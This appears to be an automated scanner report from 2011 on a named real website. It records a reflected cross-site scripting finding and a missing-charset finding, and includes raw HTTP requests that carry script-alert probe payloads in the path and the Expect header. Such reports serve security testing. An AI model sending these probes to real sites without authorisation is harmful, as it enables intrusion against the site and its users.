1. Cross-site scripting (reflected)
2. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://www.teen.com |
Path: | /favicon.ico |
GET /favicon.ico6e12d"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.teen.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Fri, 01 Apr 2011 01:39:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.3.5 Vary: Cookie X-Pingback: http://www.teen.com Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 01:39:54 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: entrance_keyword=deleted; expires=Thu, 01-Apr-2010 01:39:53 GMT Content-Length: 33026 <?php?><!DOCTYPE html> <html xmlns:fb="http://www <head> <meta name="google-site ...[SNIP]... <a onClick="recordAdCli ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.teen.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.teen.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Fri, 01 Apr 2011 01:39:52 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body bgcolor="white"> <center><h1>404 Not Found</h1></center> <hr><center>nginx/0.8.54< </body> </html> |